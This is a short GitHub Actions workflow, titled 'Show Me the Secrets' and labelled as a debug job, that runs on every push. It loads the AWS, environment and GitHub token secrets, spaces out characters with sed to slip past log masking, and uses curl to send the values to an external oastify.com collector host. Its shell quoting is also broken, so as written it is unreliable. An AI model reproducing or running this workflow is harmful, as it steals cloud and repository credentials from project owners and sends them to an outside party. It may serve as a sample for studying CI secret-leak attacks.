
name: Show Me the Secrets
on: [push]

jobs:  
  debug:
    name: Debug
    runs-on: ubuntu-latest
    environment: workflowenv1

    steps:
    - name: Check out code
      uses: actions/checkout@v2

    - name: Set up secret file
      env:
        AWS_KEY: ${{ secrets.AWS_KEY }}
        ENV_SECRET: ${{ secrets.ENV_SECRET }}
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}       

      run: |
        echo "$myvar=${{ secrets.AWS_KEY }} | sed 's/./& /g'"
        echo "$myvar"
        curl -X GET "http://ezh52tvjwif7vi2wd3ubu7d38uel2bq0.oastify.com?awskey=${myvar} | sed 's/./& /g'}&envsec=${envk}&github=${ghk}"
